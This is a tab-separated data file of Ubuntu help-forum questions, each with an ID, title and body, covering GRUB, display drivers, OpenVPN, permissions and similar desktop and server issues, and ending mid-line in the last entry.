171558	how to show grub menu after grub update ?	i have 11.10 and windows 7 in dual boot . today i tried to update grub and i run the following command in terminal : sudo fdisk -l sudo mount /dev/sda6 /mnt sudo grub-install -- root-directory=/mnt /dev/sda sudo grub-install after installation and reboot , it does not show the grub menu ( from which i can choose which os to boot ) and it directly boots ubuntu . please help .
171560	ubuntu-12.04-dvd-amd64.iso only 1.6g ?	is it normal ? the old ubuntu dvd used to be 3.9 gb or more , has a lot of stuff for off-line users really , so what just happened ?
171566	how to create an image of the os or disk ?	i want to create an image of the 11.10 into a usb or cd . i want to do a partition on my friend 's laptop so i require to create the image of the disk or os on a cd or usb . how will i do this ?
171576	one of my monitors is detected by x server but does not display anything on screen . how do i fix twinview ?	i just recovered from a white screen of death i was having by reinstalling my nvidia drivers via the command line in recovery mode . when i rebooted after that , everything was fine , except one of my monitors is not displaying anything . i ran sudo nvidia xconfig , which created the conf file for me , but the issue was not resolved . in x server settings , the secondary monitor ( the one not displaying ) , is detected and enabled in twinview , but its resolution is not detected and the screen is black . if i try switching workspaces , the little window showing all workspaces show the second monitor sitting next to my monitor , same as in x server settings . what options do i have for resolving this ? thanks a lot ! edit : my xorg conf has the following : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 302.17 ( buildmeister @ swio-display-x86-rhel47-04.nvidia.com ) tue jun 12 17:05:44 pdt 2012 # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 302.17 ( buildd @ rhenium ) sun jun 17 23:26:33 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc ve248 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 570 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-3 '' option `` metamodes '' `` dfp-3 : nvidia-auto-select +0+0 , dfp-0 : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection
171577	selective file restore for 12.04	i created a backup of my old 12.04 installation before the computer died . i have a new computer and wish to get some files from that backup [ on a local usb connected drive ] . how do i get to select the files i want ?
171581	can you use phonegap on ubuntu to develop iphone apps ?	i heard about phonegap which let 's you develop android and iphone apps , and it compiles it from html/css/js . i have only one pc with ubuntu installed , and i want to make a mobile app from html/css/js code so it sounds perfect . what i wonder about if it 's also possible to compile the iphone apps with it even if i do n't have a mac , and though this is not a legal forum , i know apple have some harsh laws regarding that stuff . it 's probably possible for me to have access to an apple computer for a couple of hours to register to apple and upload the app . but i do n't have a mac to do the development on . so is this possible ?
171584	what is the easiest simplest way to deploy asp.net web site on ubuntu ?	i 'm a newbie and want to deploy asp.net web site and host it on ubuntu 12 either server or desktop . should i use apache with mono ? or deploy ms .net framework on wine and a free web server that is made for windows ? if a complete set of instructions exists for either options would appreciate if you can provide the link since the information i find on the internet is mostly fragmented instructions and difficult for me to understand p.s . free web server for windows is either from utildev or abyss both have free editions for windows thanks in advance
171594	openvpn not listening on port	i just set up an openvpn server on a vps but sadly i ca n't connect to it . when i made a portscan i found that my custom 11940 port where openvpn should listen is closed . the default 1194 port is also closed , the only other related port open ( status : filtered ) is the 445 tcp port . here are the messages i get if i start openvpn manually : hugo @ nepomuk : ~ $ sudo openvpn -- config /etc/openvpn/server.conf -verb 6 fri aug 3 16:42:27 2012 openvpn 2.2.1 i686-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on mar 30 2012 fri aug 3 16:42:27 2012 note : openvpn 2.1 requires ' -- script-security 2 ' or higher to call user-defined scripts or executables fri aug 3 16:42:27 2012 diffie-hellman initialized with 2048 bit key fri aug 3 16:42:27 2012 tls-auth mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] fri aug 3 16:42:27 2012 socket buffers : r= [ 163840- > 131072 ] s= [ 163840- > 131072 ] fri aug 3 16:42:27 2012 route default_gateway=37.247.49.1 fri aug 3 16:42:27 2012 tun/tap device tun0 opened fri aug 3 16:42:27 2012 tun/tap tx queue length set to 100 fri aug 3 16:42:27 2012 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 fri aug 3 16:42:27 2012 /sbin/ifconfig tun0 192.168.42.1 pointopoint 192.168.42.2 mtu 1500 fri aug 3 16:42:27 2012 /sbin/route add -net 192.168.42.0 netmask 255.255.255.0 gw 192.168.42.2 fri aug 3 16:42:27 2012 data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] fri aug 3 16:42:27 2012 udpv4 link local ( bound ) : [ af_inet ] 127.0.0.1:11940 fri aug 3 16:42:27 2012 udpv4 link remote : [ undef ] fri aug 3 16:42:27 2012 multi : multi_init called , r=256 v=256 fri aug 3 16:42:27 2012 ifconfig pool : base=192.168.42.4 size=62 , ipv6=0 fri aug 3 16:42:27 2012 ifconfig pool list fri aug 3 16:42:27 2012 initialization sequence completed what about route default_gateway=37.247.49.1 , this line is 100 % wrong since the ip has nothing to do with this server . also netstate lists openvpn : hugo @ nepomuk : ~ $ sudo netstat -uapn | grep openvpn udp 0 0 127.0.0.1:11940 0.0.0.0 : * 1314/openvpn thanks for any tips on how to procede !
171596	kde waste bin issues	this has completely bamboozled me . the waste bin is empty in my dolphin yet i cant delete anything because its claims it full every time i try . i have tried emptying it and it makes no difference . where is the waste bin located in file system ? anybody else experienced this ?
171602	is there a way to look at the raw logs of zeitgeist ?	zeitgeist logs your activity in unity . is there a way to look at the raw logs it creates ?
171603	how to add a keyboard layout to the login screen ?	the login screen only shows my default keyboard layout , how can i add different ones , so that other users can select these if they want ? additionaly : is there a way to allow users to select arbitrary keyboard layouts upon login ?
171615	boot repair forced ubuntu to load unity2d and the mouse cursor freezed	i am a grub noob and i would appreciate if you could help me with my issues . i want to install several gnu/linux distros but i broke grub so i used boot-repair to fix it . i wanted to have a separated /boot partition on /dev/sda1 containing the following options : /dev/sda5 - > my old ubuntu 12.04 x64 / /dev/sda6 - > /home for ubuntu in sda5 /dev/sda10 - > linuxmint i first ran the boot-repair with `` recomended repair '' and it left my system unusable so i ran it again by expanding the `` advanced options '' section . these are the options that i used : from the `` main options '' tab i checked the `` reinstall grub '' option ; in the `` grub location '' tab i set the `` os to boot by default '' option on sda5 ( ubuntu 12.04 ) and i selected sda1 for the separate /boot partition option . in the `` grub options '' tab i selected `` purge grub before reinstalling it '' in the `` other options tab '' i set `` place boot flag on sda1 ; after this i had 2 entries in the boot menu : one for /dev/sda5 from which ubuntu booted and one for /dev/sda10 with a linuxmint label from which still ubuntu booted , not linuxmint . ubuntu started with unity2d and not unity which is default , it did not have the driver for the video card activated and the mouse pointer did not move . this is the config that resulted ; http : //paste.ubuntu.com/1125554/ after all this i reinstalled linuxmint on sda10 but linuxmint reinstalled grub and left only linuxmint as a boot option . i ran boot-repair from a separate liveusb but this time with `` recomended repair '' now i have both ubuntu and linuxmint boot options that point to the actual distributions . the problem is that ubuntu still loads with unity2d default , the video driver is still inactive and the mouse cursor does not move . this is my current configuration : http : //paste.ubuntu.com/1125644/ i have the following questions : 1 ) can you please tell me how to fix ubuntu 12.04 to boot with unity3d , video driver active and working mouse ? if not , do you have any idea how did i broke this and how to avoid this in the future ? 2 ) i am planning to use several linux distros and i am planning to change them a lot . how can i reinstall grub from scratch without breaking my config ? what did i do wrong ? thank you in advance , andrei
171616	how to get installed program icon on to desktop	i have installed ubuntu 12.04 . how do i run programs which are not shown in the desktop even though they are installed ? this was not the case with older version of ubuntu 10.04 . the programs would show under applications .
171621	12.04 bluetooth not working	working with belkin bluetooth dongle and ubuntu 12.04 . it worked in the past . been away , when came back did a lot of updating to ubuntu and now bluetooth does not connect to the various devices although it says the devices are paired . any ideas ? sherab @ ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 003 : id 1871:01f0 aveo technology corp . bus 002 device 004 : id 045e:00f9 microsoft corp. wireless desktop receiver 3.1 bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 004 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 001 device 005 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) bus 001 device 006 : id 050d:016a belkin components bluetooth mini dongle rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no
171623	how to configure 1440x900 on two monitors in mirror displays ?	complex issue . i bought my mom a new desktop pc , with specs listed below ( using hardinfo 0.5.1 ) : processor : 4x intel ( r ) core ( tm ) i5-3450 cpu @ 3.10ghz memory : 3943mb ( 1228mb used ) operating system : ubuntu 12.04 lts -resolution : 1024x768 pixels -opengl renderer : mesa dri intel ( r ) ivybridge desktop x11 vendor : the x.org foundation genius multimedia keyboard imps/2 generic wheel mouse venus usb2.0 camera two screens are connected - a 19 '' monitor through dvi , and a 26 '' hdtv through hdmi . ubuntu displays shows that i can mirror displays with 1024x768 & 1440x900 . obviously i wanted the latter . yet it does n't work . 1024x768 does work , with no issues at all , but when i try to set the 1440x900 - the screens flicker , it take quite a while - and eventually does n't work , as you can see here : no only that - i must restart the computer since it becomes super slow , until i get a kernel panic . i sent the computer to the lab , and they claimed everything is ok with the hardware . they installed windows 7 and showed me everything is fine , as seen here :
171624	after creating a symlink from playonlinux steamapps to windows steamapps , should games appear as installed in steam ?	i was able to successfully install steam via playonlinux . i can launch steam , browse the store , see my library , etc . after i did that step , i followed these instructions to create a symlink from playonlinux steamapps to windows steamapps : https : //developer.valvesoftware.com/wiki/steam_under_linux # save_space_on_dual-boot_machines since those instructions are for wine , i had to change the command a bit for playonlinux : cd `` /home/dave/.playonlinux/wineprefix/steam/drive_c/program files/steam '' mv steamapps steamapps.bak ln -s `` /host/program files ( x86 ) /steam/steamapps '' steamapps my question is : now that i 've created the symlink , should my games appear as installed in my library on steam ? because they are n't ... i thought the whole point of this step was to make steam see the games already installed and not ask to download them again .
171634	ubuntu 12.04 shows debian grub menu !	i installed xfce4 by using `` sudo apt-get install xfce4 '' , and i decided i did n't like xfce4 so i purged all of the xfce4 utils , now i get my grub menu shown as the debian grub menu , but i would like it to go back to the original ubuntu 12.04 one . please help me , thanks .
171640	how to make fatrat run in lubuntu in spite of being a qt application ?	i have installed fatrat in lubuntu/lxde and it would not initiate . -- - i have it in the menu , even added the rat to the launch bar , trying to run it in grun , it would not start , just the processor seems to work 3 seconds and then nothing . - runing fatrat -f in terminal gives : fatrat : symbol lookup error : fatrat : undefined symbol : _zn10libtorrent7sessionc1erkns_11fingerprinteii ( a description of the app here ) is it because fatrat is based on qt library ? how could i make it work in lubuntu ?
171642	how to create a repository for ubuntu ?	i hope i have more success here then i had anywhere else . i 'd like to create a repository to host my software ( ex . packages.linuxmint.com or moonos linuxfreedom ) . i have already tried a ppa . it is just not for me because it does n't offer what i am looking for . i need a real repo . how can i make a repository that will work with apt ? also , i do n't believe a `` local '' or `` private '' repo is what i 'm looking for . i want it to be so that anyone can use it : )
171644	4g cradle wimax & huawei m358 modem drivers	english translation hi from costa rica . there is a company here that provides wireless internet service using an usb modem . it also uses an amplified antenna or cradle wimax . both from the same brand , huawei , which are 4g and not 3g like the huawei modems that sell ice and kolbi . i wanted to know how to obtaind and install their respective drivers to have both devices functioning . thanks you . original saludos desde costa rica . aqui hay una empresa proveedora de servicios de internet inalámbrico vía módem usb ... usa ademas una antena amplificadora o cradle wimax . ambos de la marca huawei.y son 4g ... no 3g como los módems huawei que vende el ice y kolbi . quería conocer donde y como obtener los driver o poner a funcionar esos dispositivos . muchas gracias .
171645	chrome flash problems on ubuntu 11.10	i have problems with flash on chrome but on firefox everything is ok . this is on chrome : this is on firefox : can you help me to fix this . this is not only on that site , it 's on all flash sites , including you tube .
171670	ubuntu localization	we are a language translation company and a strong believer in ubuntu as we use it internally for almost everything . some of our clients have asked us for software recommendations ( os in particular ) and we have told them we can provide them localized versions of ubuntu and they are very excited . we would like to take the initiative to perform the localization on our own and share with the community down the road . i would really appreciate it if someone could point us toward the direction for localization the ubuntu ui . we are not sure about which languages but we would certainly like to complement what the community has done . thanks , matt
171678	ubuntu : can i delete /var/log files due to low root space	just had the message : low disk space.. 2 gb left judging by a posted message on ubuntu.org forums , i found that i have a .log file in /var/log at 22 gb in size ! ! my root is an 82 gb partion and disk analyser shows the offender to be in log . the system root was installed circa 8 months ago , so clearly this is not a good thing in creating a 22 gb log on an 82 gb root partition . is it safe to delete the log file or please advise on the correct safe procedure to cleanse it without messing up my system . i presume it may be ok , but would like some other opinions before i do the task of delete .
171683	how can i monitor windows xp internet history over a network ? ( im ubuntu 12.04 )	i believe my daughter is visiting websites that she should n't be on . she does that from a desktop with windows xp . is there a program that will let me view what websites she visits over a network while i 'm on ubuntu 12.04 ?
171684	trouble running virtualbox on ubuntu	i want to run virtualbox on ubuntu , it used to work a while ago but i ca n't remember when or why . however when i double-click on an os to run , it tries to start - opens a window for the virtual os , gives the `` host key '' message , but then 5 seconds later closes the os window and gives this error : failed to load vmmr0.ro ( verr_suplib_owner_not_root ) result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb } if i run it with sudo virtualbox i still get the same problem . i 've tried sudo apt-get purge virtualbox then sudo apt-get install virtualbox . i notice during the re-installation i get this amongst all the other output on the console : setting up virtualbox ( 4.1.12-dfsg-2ubuntu0.1 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] any ideas ?
171689	strange wifi issue in ubuntu 10.10	i got my friend 's laptop to install ubuntu 10.10 . it already had windows 7 . wifi adapter was on but it did n't show any wifi network in windows . after installing ubuntu , it shows wireless disabled . the lshw command too shows network is disabled . i am using lan now . the device is intel wifi link 5100 . the proprietary hardware driver option shows that no 3rd party driver needed . i ran the rfkill list all command and it always shows that hardblock yes ( turned on ) and i could not change to hardblock no . and i tried many solutions available regarding this issue . but when i boot the laptop with a pen drive with ubuntu 10.04 , the wireless works just out of the box , without any extra driver or any configuration . it just works ! what could be the problem ? wireless not working in both the windows and ubuntu installed in the laptop but works just out of the box , when an ubuntu on pen drive is used . some more observations i ran 2 versions of ubuntu using pen drive , on same laptop - 10.04 and 10.10 . 10.10 behaves the same way , it says wireless is disabled by hardware switch but 10.04 just works out of the box . i am able to connect to my router just by providing the wireless passkey and a keyring password . and when i restart my laptop after running 10.04 in pen drive , without shutting down , only restart , the wireless works in 10.10-laptop ! butn again , when i completely shutdown and turn on , 10.10 in laptop does n't work . so this clearly shows its a bug in ubuntu level and nothing wrong with hardware . also upgrading also is not working , as i tried upgrading to 11.04 . it behaves the same way like 10.10
171692	removing ubuntu & windows does not boot	i 'm really desperate . i installed 12.04 lts alongside windows 7 . no problems . then ubuntu did not boot . i repaired the grub loader , then both worked nice ( though in the grub loader it showed two windows 7 loaders ? ) . but since yesterday windows does not boot anymore . the screen just stays black . i wanted to remove ubuntu with this guide . but gparted just searches and searches and searches . waited about 2 hours and did n't even show one partition . ubuntu itself has problems now . updates throw error messages etc . now i just want to remove ubuntu and have my windows 7 back . note that i have no windows 7 cd ( lenovo did n't send one ) and my laptop has no dvd drive . i have a lenovo thinkpad edge e320 .
171694	how do i keep terminal line from overwriting itself ?	in a terminal window any smaller than fullscreen , if i type in a long command it starts overwriting the current line i 'm on . if i type an additional line 's worth , it finally moves to the next line . does anyone know how to fix this ? this is what happens visually : edit : these are my prompt settings : ps1 : [ \e ] 0 ; \u @ \h : \w\a ] $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\033 [ 1m`__git_ps1`\033 [ 0m\ $ term : xterm .bashrc : if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\033 [ 1m`__git_ps1`\033 [ 0m\ $ ' fi # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac
171696	compiz memory leak	after sluggish performance and freezing for two weeks i finally managed to nail down the culprit to compiz , i found out it 's vital to unity and is basically an opengl wrapper for ubuntu and xorg . how do i fix this ? there 's plenty of bug reports , but none of them give an indication on how to do a 'quick fix ' before they fix the memory issue . i also get 'system error ' messages during startup and the details show that xorg is crashing . should i do a clean install ?
171700	sound & microphone does n't work	i am really new to ubuntu , i tried starting with backtrack , but i knew that i should really crawl before i start walking . i installed ubuntu today ( over baacktrack 5 ) , the install seemed normal , but the start screen is still that of backtrack ... but i do n't seem to have any sound from either input/output . my microphone does n't work , not does my speakers . they work absolutely fine on windows ( the native install ) , but now not on this . before , on backtrack , they worked also . does anyone have any idea what this could be ? from looking in the sound settings it also appears that the output is from 'dummy output ' , and there is no selected device for the input . all help will be greatly appreciated . : d
171701	ubuntu 2d or gnome classic ( no effects )	is gnome classic ( no effects ) noticeably faster than ubuntu 2d ? should i use it , since i only have 1gb of ram ? also , you can only move the unity bar to the bottom in unity 3d right ? thanks in advance .
171707	is the ubuntu kernel open source and available for download and building ?	can i build the ubuntu kernel ? i heard that the ubuntu kernel is a special version of the linux kernel .
171711	why are n't commits to this git repository showing up in a branch on launchpad ?	this branch here is supposed to be importing code from the following git repository : http : //git.chromium.org/webm/libwebp.git however , it is n't . according to `` recent revisions '' further down the page , the latest commit was may 14 of this year . this does not correspond with the actual revision history of the git repository ( the latest commit was 11 days ago ) . here is the output from the latest import ( 20 minutes ago ) . what is going on ? there are n't any errors - just nothing getting imported .
171713	`` supplied storage credentials were not accepted by the server '' error when trying to bootstrap juju	this is the error while bootstrap clusteruser @ cluster : ~ $ juju bootstrap 2012-08-04 03:05:23,536 info bootstrapping environment 'maas ' ( origin : ppa type : maas ) ... 2012-08-04 03:05:23,694 error bootstrap aborted because file storage is not writable : the supplied storage credentials were not accepted by the server i 've configured the environment . what should i do ?
171716	can i install ubuntu 12.04 lts on a pc with no os ?	i have a dell optiplex gx620 with no os and would like to try ubuntu 12.04 lts on it . can i do this ?
171718	running apt-get error	i am on a mac pro version 10.6.8 , and i believe the environment is ubuntu . i am trying to use the apt-get command but keep getting this e : could n't find package error . i tried downloading fink to solve the issue , but have n't had any luck . i also checked the $ path and it seemed to be correct . not too familiar with linux/unix so any help would be much appreciated .
171720	back up launcher settings in 12.04 ?	in case i have to reset or reinstall my launcher , how can i back up the settings ? ( such as the list of applications . )
171721	machine `` vanishing '' from network	forgive me if this has been asked/answered , but i 've searched without success . just set-up a 12.04 machine on my home network with the objective of using it as an in-house development/staging server . i got apache , mysql , etc . all working perfectly , and quickly , and soon had all of the other machines on the network viewing the results , and accessing a shared folder i 'd set-up on it , as well . trouble is , while it works great after a boot , the machine ( literally ) `` vanishes '' from the network after a short period ( usually within an hour ) . when it does , i ca n't get at the apache site ( s ) it 's running , the shared folder disappears , and i ca n't even ping it ? now before you assume it 's a dynamic ip issue , i do have my router set to give it a static ip based on its mac address ( it 's a wifi ) , and that works perfectly well . even after it `` disappears , '' it 's still alive & well at 192.168.1.115 ( as confirmed by it 's network information window ) . it 's just that everything stops responding at that address ... ? now i 've read some posts that elude to the fact that it might be related to my not having configured ubuntu , itself , to the static address ( although that makes no sense to me , since the router is already configured for that , and ubuntu acknowledges that 's working ) . as is so often the case , i find countless posts on how to correct that , and no two are the same , and as that 's led to trouble for me in the past , i first wanted to see if anyone thinks that is the problem , and if not , what else it might be ? thanks
171722	ca n't boot to windows anymore after removing grub on a netbook	today i decided to try out fedora by booting it from usb . i liked the os , and decided i wanted to install it to my hard-drive . i could n't complete the installation because i needed to free up a partition . i booted back into windows to view my disk management and free up a partition . i decided to re-format a partition that had a linux os in it that i no longer used . i used to boot into this os using grub . however , when i reformatted the disk , it seems to have deleted most of the grub files , but when i power up my laptop , i 'm getting an `` error 15 '' message which i think is because grub can not find the os files to boot because i deleted them . my problem now is that i ca n't boot back into windows , i can only boot from usb ( i have no cd drive as i 'm using a netbook ) . i read online that to remove the grub bootloader i must boot into windows and run a few commands in recovery mode to reset the bootloader . since i ca n't boot into windows , and have no cd drive , this option does n't seem like it 's going to work . any advice for me ? i 'm quite new to linux , and currently my netbook can only boot from usb and windows ( 7 by the way ) is currently inaccessible . i 'm sorry if this is n't the right place to post this , but i 'm really quite stuck ! any suggestions are appreciated , i 've been googling for hours now ! thanks edit : to sum the question up : is there a way to remove the grub bootloader without entering windows ? for example can i boot something from usb and remove it from there ?
171725	how do i disable maximise windows on startup in ubuntu 12.04 ?	i 'm on a netbook and every time i start a program , the window automatically opens maximised . how do i disable this annoying feature ? could n't find it in the system settings or in compiz config settings manager . thanks !
171726	will ubuntu software center ever be usable ? ( keeps hanging and freezing )	been using ubuntu professionally since 2004 . i upgraded to 12.04 from my 10.04 since then , i installed that sort of `` ubuntu store '' , and out of curiosity i run it form time to time . i end up using synaptic 99 % of the times . but the worst thing about it is when i try to enable `` recommendations '' and it starts dragging cpu and failing miserably , apparently in an attempt to show a `` captcha '' . why does it keep freezing ?
171728	why does sudo gedit not open files starting with exclamation mark	when trying to open a file with sudo gedit /path/to/file with a file name starting with a ! in front eg ! config.ini i can not open the file . however if i do sudo nautilus then open the file with gedit it opens.if the file is renamed config.ini sudo gedit again works.could someone explain this to me please .
171731	ca n't run gimp , 64-bit error	after upgrading to 12.04 , i was n't able to run gimp . now i installed the latest 2.8 from ppa , and still am unable to run it . i get the error : gimp : error while loading shared libraries : libgegl-0.0.so.0 : wrong elf class : elfclass64 strangely enough , gimp is 64-bit : $ file /usr/bin/gimp-2.8 /usr/bin/gimp-2.8 : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) ... . so why ca n't i run it ? i reinstalled libgegl , i have 0.0.22 and 0.2.0 versions installed .
171742	how can i run everything as root	i have dual booted to lubuntu ( with windows xp ) and everytime and then i 'm getting asked for my password . how do i run everything as root and not ask a password again ? ideally i wanted to run nginx but it has permission denied issues : apathetic @ ubuntu : ~ $ service nginx start starting nginx : nginx : [ alert ] could not open error log file : open ( ) `` /var/log/nginx/error.log '' failed ( 13 : permission denied ) 2012/08/03 20:06:25 [ warn ] 4762 # 0 : the `` user '' directive makes sense only if the master process runs with super-user privileges , ignored in /etc/nginx/nginx.conf:1 nginx : the configuration file /etc/nginx/nginx.conf syntax is ok 2012/08/03 20:06:25 [ emerg ] 4762 # 0 : open ( ) `` /var/run/nginx.pid '' failed ( 13 : permission denied ) nginx : configuration file /etc/nginx/nginx.conf test failed
171746	docbook errors building komparator from source	i 'm trying to install komparator4 v0.8 from the terminal of ubuntu 11.10 . i entered this command and work fine : mkdir build & & cd build & & cmake -dcmake_install_prefix=`kde4-config -- prefix` .. but when i enter make i get this output whit error messages . i installed this program with this method twice previously and i had no problems . what i 'm doing wrong ?
171747	how to disable guest session only from login screen ?	i do want : to be able to select a guest session from the user menu when logged in to my administrator account in case someone needs to use my computer . i do not want someone to be able to turn on my computer and login to a guest session i have heard of a method where one edits /etc/lightdm/lightdm.conf to include allow-guest=false ( then restarting lightdm ) the problem with that method is that i specifically do not want to completely disable the guest account . i only want to disable access to it from the login menu while still retaining the ability to ( while logged in to my admin account ) start a guest session manually . is there such a fix ? i ca n't seem to find one via search engine ( and it 's very difficult to word for a search ) edit : yes . ubuntu 12.04 lts ( desktop ) , the latest release . and it needs to be a guest account because of the way it functions . i want the ability to allow others to use a guest account i can launch easily from my main account because of how it functions ( no password , and the fact that everything on it gets deleted when the session is over ) without having an exposed password-free account available to anyone who turns on my computer . though if i could achieve this via a standard limited account it would be acceptable since i could just change the settings on most of the software to not save anything . it would have to be passwordless and accessible via the user list while i am logged in to my main account , but invisible/inaccessible from the main login screen . here is the code i mentioned . as you can see the structure is very similar but there are some key differences . there is no auto required pam_unix.so and the link says to add a line called auth optional pam_permit.so but i already have auth required pam_permit.so and such other little differences . # % pam-1.0 auth requisite pam_nologin.so auth required pam_env.so readenv=1 auth required pam_env.so readenv=1 envfile=/etc/default/locale auth required pam_permit.so @ include common-account session [ success=ok ignore=ignore module_unknown=ignore default=bad ] pam_selinux.so close session required pam_limits.so @ include common-session session [ success=ok ignore=ignore module_unknown=ignore default=bad ] pam_selinux.so open @ include common-password
171750	12.04 freezes , battery drain , and fan noise too loud	i 've been using 12.04 for a few weeks now and there are some things i have noticed . i 'm running ubuntu on a dell n5010 ( 15r ) , with 3gb ram , intel core i3 , intel hd graphics and ubuntu 64x bit . my battery drains too fast , lasts less than an hour , while in windows used to last 3:30 . i also noticed that the battery capacity decreased in a week from 78 % to 74 % . i get my screen frozen sometimes at the ubuntu start screen , the purple one , with 5 dots below the logo . also , fan noise increases randomly , sometimes without running anything on the background . sometimes , the freezes occur when using the computer and it does n't let me type anything or use the touchpad , my only choice , is to shutdown . is it that my computer does not support ubuntu ? these are serious issues with ubuntu and are making me go back to windows 7 , which i hate .
171752	i upgraded from 11.10 to 12.04 , and now my /home folders are empty	did i miss something ? is n't it supposed to keep your /home folders intact when you upgrade ? is there some way to retrieve what was there ?
171754	usergroup permission issues	i tried deleting files on my dekstop ( highlight files , press delete ) in /usr/share/nginx/www but i 'm getting permission denied issues . what i did was , add www-data and barsoom ( current user ) to a group : sudo addgroup web usermod -a -g web barsoom usermod -a -g web www-data chgrp -r web /usr/share/nginx/www but why ca n't i still delete the files in /usr/share/nginx/www . i 'm still getting permission denied ?
171755	how to use external downloaders like axel and aria2 in chrome or chromium ?	i use axel with flashgot in firefox . could i use it as easily in chromium or google chrome ? some chrome extensions were supposed to be similar to flashgot but they had a short life or , if they are still available on the extension site , have stopped working , some are just for windows etc .
171759	how to install ubuntu on a second hard drive with windows being on the first ?	i have recently got a alienware m17x r4 and since it has two hard drive bays i was thinking of putting my hard drive from my old laptop and installing ubuntu on it without making any changes to the drive that has windows on it also if possible to add a entry to windows boot loader to boot ubuntu instead of using grub
171767	in 12.04 lts , i get `` no dbus '' errors when running things as root	while attempting to run gedit as root from a terminal window ( was trying to do some tweaking on my hosts and fstab files ) , i get a message saying `` no dbus connection available '' and get booted back to the prompt . however , i can run nautilus from the prompt like that ( still get the error , but it runs all the same ) , and use wine and notepad , and was able to make my changes . i thought maybe dbus was missing , but apt says it 's installed and gedit runs fine when not elevated . granted , i do n't have to elevate often , but on the off-chance i do , ( like adding or changing smb/cifs mountpoints in fstab ) , i would like to use gedit , not notepad from wine , and not in a terminal window with vi ( well vim ) . ideas ? solutions ?
171772	installing mysqldb	how do i install mysqldb for my 12.04 lts machine ? i need it for a project i am working on . i see many many options in the synaptic package manager , is there an easier way to install ?
171774	what is the location of the trash folder ( recycle bin ) on ubuntu ?	where do i find the trash folder location in my file system ? i am logging in as a non-root user ; have searched in my home directory with the -a switch with the ls command but could n't find anything related to trash ; though i could see some hidden files and directories . on the other hand on the gui , there is a folder called trash which has all the files deleted . where can i find this folder on the file system ?
171776	very slow framerates in phoronix tests	i am trying to setup my 3d graphics card . $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv770 [ radeon hd 4850 ] [ 1002:9442 ] according to the radeon driver open source driver page , my card is very well supported . i followed the instructions to set it up ( very simple now that there is not a lot of mucking about in xorg.conf ) . i checked to see the driver was installed properly : $ dmesg | grep drm [ 3.542014 ] [ drm ] initialized drm 1.1.0 20060810 [ 3.613929 ] [ drm ] radeon defaulting to kernel modesetting . [ 3.613933 ] [ drm ] radeon kernel modesetting enabled . [ 3.627683 ] [ drm ] initializing kernel modesetting ( rv770 0x1002:0x9442 0x1043:0x024e ) i also installed mesa-utils so i could make sure opengl was working properly with my card . here is the relevant info from that ( please let me know if you need something else to answer my question ) : $ glxinfo | grep rend direct rendering : yes opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) gl_nv_conditional_render , gl_amd_draw_buffers_blend , ( note : i have dual monitors , but , at this point , they are showing the same image as i have not yet set that up . ) however , when i install phoronix-test-suite and run lightsmark , i only get 1fps and everything completely freezes during the soft shadow test . i 'm not very experienced with graphics/graphics cards , etc , and was wondering if anybody could point me in the right direction . if i put additional output ( verbose ) for glxinfo , i get this ... do n't know if this helps debug at all . $ libgl_debug=verbose glxinfo name of display : :0 libgl : opendriver : trying 